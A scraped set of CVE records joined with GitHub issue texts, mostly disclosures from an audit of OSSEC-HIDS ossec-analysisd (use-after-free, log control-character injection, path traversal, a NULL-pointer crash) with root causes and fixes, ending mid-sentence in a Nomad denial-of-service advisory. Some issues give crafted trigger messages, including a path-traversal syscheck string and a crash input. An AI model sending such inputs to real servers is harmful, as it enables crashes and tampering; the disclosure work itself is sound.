Hi folks, I spent some free time recently auditing OSSEC. I was primarily focused on a threat model where an OSSEC agent is compromised (e.g. the agent key and assoc. counters are known) and used to attack the OSSEC server (primarily `ossec-remoted` and `ossec-analysisd`). Given the problem domain of OSSEC and HIDS generally I think this is fair game. Since these are post-auth bugs and there isn't guidance on vulnerability disclosure in the README I thought it was acceptable to post information full-disclosure to the repo. I found a handful of bugs and have done my best to address the root cause, the affected versions, the impact and potential fixes in the issues I've filed. I will request CVEs for the security relevant bugs later on. In terms of rough risk levels I'd categorize the findings as follows: Informational: * os_regex-empty-pcre2-off-by-one - https://github.com/ossec/ossec-hids/issues/1811 (_Edit: now fixed by https://github.com/ossec/ossec-hids/pull/1826_) * rootcheck-check-rc-if-shell-injection-risk - https://github.com/ossec/ossec-hids/issues/1812 Low: * analysisd-syscheck-decoder-msg-location-path-injection (CVE-2020-8446) - https://github.com/ossec/ossec-hids/issues/1813 * analysisd-OS_CleanMSG-allows-control-chars-in-msg (CVE-2020-8445) - https://github.com/ossec/ossec-hids/issues/1814 * analysisd-OS_CleanMSG-bad-location-segfault (CVE-2020-8448) - https://github.com/ossec/ossec-hids/issues/1815 (_Edit: now fixed by https://github.com/ossec/ossec-hids/pull/1823_) * ~analysisd-syscheck-decoder-off-by-one-read - https://github.com/ossec/ossec-hids/issues/1819~ (_Edit: I made a mistake in my analysis here, it's not a bug_). Med: * analysisd-OS_CleanMSG-off-by-one-syslog (CVE-2020-8443) - https://github.com/ossec/ossec-hids/issues/1816 (_Edit: now fixed by https://github.com/ossec/ossec-hids/pull/1824_) * analysisd-OS_ReadMSG-use-after-free-ossecalert (CVE-2020-8444) - https://github.com/ossec/ossec-hids/issues/1817 * analysisd-OS_ReadMSG-use-after-free-syscheck (CVE-2020-8447) - https://github.com/ossec/ossec-hids/issues/1818 High: * analysisd-rootcheck-decoder-heap-overflow (CVE-2020-8442) - https://github.com/ossec/ossec-hids/issues/1820 (_Edit: now fixed by https://github.com/ossec/ossec-hids/pull/1825_) Some caveats/context to add: 1) I'm not a professional C coder, w.r.t suggested fixes YMMV! 2) I don't write exploits for a living. My assessments of exploitability/risk should be considered lower bounds. 3) This wasn't an extensive audit. I followed my nose and used some fuzzing. 4) OSSEC 2.7 seems to be the earliest tag in the Github repo. I didn't dig deeper into history to see if any of these bugs affect older releases (some likely do). If you would be interested in trying to adopt fuzzing as part of your CI (or as an integration with oss-fuzz, etc) I'd be happy to try and provide some notes but likely don't have the resources to implement it myself to a merge-able standard of work. Thanks! You can close this top-level issue as you see appropriate.
OSSEC-HIDS Security Audit Findings
https://api.github.com/repos/ossec/ossec-hids/issues/1821/comments
5
2020-01-15T21:02:37Z
2020-10-03T14:29:23Z
https://github.com/ossec/ossec-hids/issues/1821
550,427,631
1,821
1,050
CVE-2020-8444
2020-01-30T01:15:10.837
In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a use-after-free during processing of ossec-alert formatted msgs (received from authenticated remote agents and delivered to the analysisd processing queue by ossec-remoted).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1817" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1817" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ossec:ossec:*:*:*:*:*:*:*:*", "matchCriteriaId": "B349E3E6-F70E-41A0-843D-202A82473ABD", "versionEndExcluding": null, "versionEndIncluding": "3.5.0", "versionStartExcluding": null, "versionStartIncluding": "2.7", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/ossec/ossec-hids/issues/1817
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ossec", "ossec-hids" ]
The `ossec-analysisd`'s `OS_ReadMSG` function calls `OS_CleanMSG` at the start of processing a received message from the ossec queue UNIX domain socket. In `src/analysisd/cleanevent.c` the `OS_CleanMSG` function populates the `lf` struct, setting fields like `log`, `hostname` and `program_name` to substrings of the `lf->full_log` buffer. After cleaning any messages that meet the ossec-alert decoder's criteria are given to that decoder for further processing. After processing an ossec alert msg from a client the ossec alert decoder will free the `lf->full_log` pointer at the end of its processing, replacing it with a new pointer and populating `lf->generated_rule`: https://github.com/ossec/ossec-hids/blob/abb36d4460b9f44ee90790d1138192bb01a2b21c/src/analysisd/decoders/plugins/ossecalert_decoder.c#L184-L191 Though the `OSSECAlert_Decoder_Exec` function returns `NULL` and not `1` further rule processing of the `lf` struct occurs during `OS_ReadMSG` because of the `lf->generated_rule` set by the decoder before freeing `lf->full_log`. https://github.com/ossec/ossec-hids/blob/abb36d4460b9f44ee90790d1138192bb01a2b21c/src/analysisd/analysisd.c#L872-L879 If any subsequent processing associated with the generated rule accesses the `lf->hostname` or `lf->program_name` fields set by `OS_CleanMSG` they will be accessing memory of a freed heap chunk previously containing the `lf->full_log`. I believe the bug was introduced in fcca01326255d66fa2b3f75357cda3780169c86d on July 23, 2008 and affects OSSEC v2.7+. This is triggerable via an authenticated client through the `ossec-remoted`. The client needs only write a ossecalert message that will have the `program_name` or `hostname` set during `OS_CleanMSG`. I don't have a strong sense for the possibility of exploitation. I suspect this may be turned into an out of bounds read of heap memory accessing `program_name` or `hostname` during rule processing if the area pointed to after the syscheck decoder free isn't null terminated. One possible fix would be for the ossecalert decoder to `os_strdup` the `lf->hostname` and `lf->program_name` before freeing `full_log`.
CVE-2020-8444: analysisd: OS_ReadMSG heap use-after-free with ossec-alert msgs.
https://api.github.com/repos/ossec/ossec-hids/issues/1817/comments
4
2020-01-15T21:00:51Z
2021-03-05T21:04:09Z
https://github.com/ossec/ossec-hids/issues/1817
550,426,873
1,817
1,052
CVE-2020-8445
2020-01-30T01:15:10.917
In OSSEC-HIDS 2.7 through 3.5.0, the OS_CleanMSG function in ossec-analysisd doesn't remove or encode terminal control characters or newlines from processed log messages. In many cases, those characters are later logged. Because newlines (\n) are permitted in messages processed by ossec-analysisd, it may be possible to inject nested events into the ossec log. Use of terminal control characters may allow obfuscating events or executing commands when viewed through vulnerable terminal emulators. This may be an unauthenticated remote attack for certain types and origins of logged data.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1814" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1814" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ossec:ossec:*:*:*:*:*:*:*:*", "matchCriteriaId": "B349E3E6-F70E-41A0-843D-202A82473ABD", "versionEndExcluding": null, "versionEndIncluding": "3.5.0", "versionStartExcluding": null, "versionStartIncluding": "2.7", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/ossec/ossec-hids/issues/1814
[ "Third Party Advisory" ]
github.com
[ "ossec", "ossec-hids" ]
The `ossec-analysisd`'s `OS_CleanMSG` function doesn't remove or encode terminal control characters or newlines from processed log messages. In many cases those control characters/newline are later logged. There have been cases where allowing arbitrary control characters in log messages has led to command execution with specific terminal emulator implementations. As a result many pieces of software (e.g. [Apache HTTPD](https://nvd.nist.gov/vuln/detail/CVE-2013-1862)) have added escaping of control characters in log messages. It may also be possible to abuse terminal control characters to hide previous messages in a log, tricking system administrators into missing events. Similarly, because newlines (`\n`) are permitted in messages processed by `ossec-analysisd` it may be possible to inject nested events to the ossec log. This may result in system administrators being tricked into thinking alerts fired that did not.
CVE-2020-8445: analysisd: OS_CleanMSG allows control characters in msg.
https://api.github.com/repos/ossec/ossec-hids/issues/1814/comments
1
2020-01-15T20:59:57Z
2020-01-30T14:37:12Z
https://github.com/ossec/ossec-hids/issues/1814
550,426,476
1,814
1,053
CVE-2020-8446
2020-01-30T01:15:10.993
In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to path traversal (with write access) via crafted syscheck messages written directly to the analysisd UNIX domain socket by a local user.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1813" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1813" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ossec:ossec:*:*:*:*:*:*:*:*", "matchCriteriaId": "B349E3E6-F70E-41A0-843D-202A82473ABD", "versionEndExcluding": null, "versionEndIncluding": "3.5.0", "versionStartExcluding": null, "versionStartIncluding": "2.7", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/ossec/ossec-hids/issues/1813
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ossec", "ossec-hids" ]
The `ossec-analysisd`'s syscheck decoder (`src/analysisd/decoders/syscheck.c`) performs unsafe path handling using the received agent name when trying to get the agent file. The `DB_File` function uses the agent name unsanitized when building a file name to be used with `fopen`. https://github.com/ossec/ossec-hids/blob/abb36d4460b9f44ee90790d1138192bb01a2b21c/src/analysisd/decoders/syscheck.c#L212-L216 Processing a syscheck message like `8:a/../../etc/shared/test.txt:aaaaaaa aaaa'` from an agent named `test` sending from localhost results in an `open` for `queue/syscheck/(test) 127.0.0.1->a/../../etc/shared/test.txt` This will fail with `ENOTDIR` because the part of the path the attacker can't control remotely (`(test) 127.0.0.1->a`) is not a directory. Creating it first by sending a message like `8:a:aaaaaaa aaaa` seems like a potential solution at first but won't work because while the file `queue/syscheck/(test) 127.0.0.1->a` will be created it won't be created as a *directory* but a regular file. I suspect this means that the bug is only useful to local attackers (that can write directly to the ossec queue). Writing directly to the queue allows full control of the `lf->location` used as the `agent` argument to `fopen` and can cause the syscheck DB file to be created in an attacker controlled location within the `chroot`. Remote attackers can not control the full `lf->location` since the `ossec-remoted` ensures the prefix of agent name and source IP is always present. Likely the best fix is to use the `w_ref_parent_folder` function from `src/shared/file_op.c` on the location field populated by `OS_CleanMSG` and rejecting any values that have a `1` return from that function.
CVE-2020-8446: analysisd: syscheck decoder location path injection.
https://api.github.com/repos/ossec/ossec-hids/issues/1813/comments
1
2020-01-15T20:59:40Z
2020-01-30T14:37:32Z
https://github.com/ossec/ossec-hids/issues/1813
550,426,349
1,813
1,054
CVE-2020-8447
2020-01-30T01:15:11.070
In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a use-after-free during processing of syscheck formatted msgs (received from authenticated remote agents and delivered to the analysisd processing queue by ossec-remoted).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1818" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1818" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ossec:ossec:*:*:*:*:*:*:*:*", "matchCriteriaId": "B349E3E6-F70E-41A0-843D-202A82473ABD", "versionEndExcluding": null, "versionEndIncluding": "3.5.0", "versionStartExcluding": null, "versionStartIncluding": "2.7", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/ossec/ossec-hids/issues/1818
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ossec", "ossec-hids" ]
The `ossec-analysisd`'s `OS_ReadMSG` function calls `OS_CleanMSG` at the start of processing a message read from the ossec queue UNIX domain socket. In `src/analysisd/cleanevent.c` the `OS_CleanMSG` function populates the `lf` struct, setting fields like `log`, `hostname` and `program_name` to substrings of the `lf->full_log` buffer. After cleaning any syscheck messages are given to the syscheck decoder for further processing. After processing a syscheck msg from a client the syscheck decoder will free the `lf->full_log` pointer in two places. One place is if the message indicated a change in an existing tracked file: https://github.com/ossec/ossec-hids/blob/60cf8d2e941bcded8a05810d87cb906ff771df92/src/analysisd/decoders/syscheck.c#L572-L576 Another place is if the message indicated a new file to track: https://github.com/ossec/ossec-hids/blob/60cf8d2e941bcded8a05810d87cb906ff771df92/src/analysisd/decoders/syscheck.c#L601-L604 In both cases the syscheck decoder replaces the existing `lf->log` and `lf->full_log` pointers with pointers to new messages after first freeing the old `lf->full_log`. Afterwards the `DB_Search`, and `DecodeSyscheck` functions return 1 to `OS_ReadMSG`. Since the decoder returned 1, the `OS_ReadMSG` function will continue processing the event, it will not jump to `CLMEM`: https://github.com/ossec/ossec-hids/blob/60cf8d2e941bcded8a05810d87cb906ff771df92/src/analysisd/analysisd.c#L762-L765 If any subsequent processing rules access the `lf->hostname` or `lf->program_name` fields set by `OS_CleanMSG` they will be accessing memory of a freed heap chunk previously containing `lf->full_log`. I believe the bug was introduced in 8672fa0d5acd1087c285e664804bfa455e9cfd07 on Nov 18, 2006 and affects OSSEC v2.7+. This code path is triggerable via an authenticated client through the `ossec-remoted`. The client needs only write a valid syscheck message that will have the `program_name` or `hostname` set during `OS_CleanMSG`. I don't have a strong sense for the possibility of exploitation. I suspect this may be turned into an out of bounds read of heap memory accessing `program_name` or `hostname` during rule processing if the area pointed to after the syscheck decoder free isn't null terminated. One possible fix would be for the syscheck decoder to `os_strdup` the `lf->hostname` and `lf->program_name` before freeing `full_log`.
CVE-2020-8447: analysisd: OS_ReadMSG heap use-after-free decoding syscheck msgs.
https://api.github.com/repos/ossec/ossec-hids/issues/1818/comments
2
2020-01-15T21:01:03Z
2020-01-30T14:35:52Z
https://github.com/ossec/ossec-hids/issues/1818
550,426,963
1,818
1,055
CVE-2020-8448
2020-01-30T01:15:11.133
In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a denial of service (NULL pointer dereference) via crafted messages written directly to the analysisd UNIX domain socket by a local user.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1815" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1815" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ossec:ossec:*:*:*:*:*:*:*:*", "matchCriteriaId": "B349E3E6-F70E-41A0-843D-202A82473ABD", "versionEndExcluding": null, "versionEndIncluding": "3.5.0", "versionStartExcluding": null, "versionStartIncluding": "2.7", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/ossec/ossec-hids/issues/1815
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ossec", "ossec-hids" ]
In `src/analysisd/cleanevent.c` the `ossec-analysisd`'s `OS_CleanMSG` function handles the location portion of a message differently when the first character after a 2 digit ID is `(`, indicating it came from a remote agent via `ossec-remoted`. When remote agent locations are processed `OS_CleanMSG` tries to null terminate the received location substring of the overall log message to store in `lf->location` by advancing past the `->` in the string to the first `:` character: https://github.com/ossec/ossec-hids/blob/abb36d4460b9f44ee90790d1138192bb01a2b21c/src/analysisd/cleanevent.c#L45-L59 Unfortunately the nesting of `strstr` as the first argument to `strchr` on L48 doesn't account for the possibility of a location string that starts with `(` but doesn't contain a `->`. E.g. processing the msg `00:(:` will result in the `strstr` returning NULL, meaning the `strchr` call will be `strchr(NULL, ":")` and a segfault will occur. This code was introduced in 95cd0c9bae450e101222f9fae5127e7034a252ca on Nov 13, 2013. I believe it affects [OSSEC 2.7+](https://github.com/ossec/ossec-hids/releases/tag/v2.7). It seems that in all cases `ossec-remoted` will always write a well-formed location into the message it writes to the `ossec` UNIX domain socket queue because it uses `SendMSG` and populates the `locmsg` unconditionally: https://github.com/ossec/ossec-hids/blob/abb36d4460b9f44ee90790d1138192bb01a2b21c/src/remoted/secure.c#L187-L190 https://github.com/ossec/ossec-hids/blob/abb36d4460b9f44ee90790d1138192bb01a2b21c/src/shared/mq_op.c#L85 I believe that means the only way this is triggerable is with direct write access to the socket, and probably makes the exploitability very low. One possible fix (edit: implemented in https://github.com/ossec/ossec-hids/pull/1823) is to separate the `strstr` and return an error when it returns `NULL` before performing the subsequent `strchr` with the result pointer.
CVE-2020-8448: analysisd: OS_CleanMSG segfault processing invalid msg location.
https://api.github.com/repos/ossec/ossec-hids/issues/1815/comments
1
2020-01-15T21:00:12Z
2020-01-30T14:36:54Z
https://github.com/ossec/ossec-hids/issues/1815
550,426,613
1,815
1,056
CVE-2020-7218
2020-01-31T13:15:10.533
HashiCorp Nomad and Nonad Enterprise up to 0.10.2 HTTP/RPC services allowed unbounded resource usage, and were susceptible to unauthenticated denial of service. Fixed in 0.10.3.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/hashicorp/nomad/issues/7002" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.hashicorp.com/blog/category/nomad/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/hashicorp/nomad/issues/7002" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.hashicorp.com/blog/category/nomad/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hashicorp:nomad:*:*:*:*:-:*:*:*", "matchCriteriaId": "3997DB3C-4BE4-40DF-A321-3010EAF570A4", "versionEndExcluding": "0.10.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:hashicorp:nomad:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "F55BD7DC-1A56-4EBA-990E-16F4E88EF616", "versionEndExcluding": "0.10.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/hashicorp/nomad/issues/7002
[ "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "hashicorp", "nomad" ]
**Vulnerability ID:** CVE-2020-7218 **Versions:** Previous versions of Nomad and Nomad Enterprise; fixed in 0.10.3. A vulnerability was identified in Nomad such that unbounded resource usage, triggered by the establishment of many unauthenticated HTTP or RPC connections, may generate excessive load and/or crash the server. This vulnerability affects all previous releases of Nomad, and is fixed in the 0.10.3 release. ## Background Nomad utilizes HTTP for networked communication between Nomad cluster members and control/administration of Nomad servers. Nomad clients are configured to communicate with their regional servers and communicate using remote procedure calls (RPC) to register themselves, send heartbeats for liveness, wait for new allocations, and update the status of allocations. These RPC requests/responses traverse the network between Nomad nodes using TCP. Nomad’s HTTP and RPC both support using end-to-end TLS with optional client authentication. ## Vulnerability Details An internal security review identified a vulnerability such that it was possible to consume excessive Nomad server resources via HTTP and RPC services. A Nomad server was exposed to denial of service attack by any party with network-level connectivity to that server. Authentication via 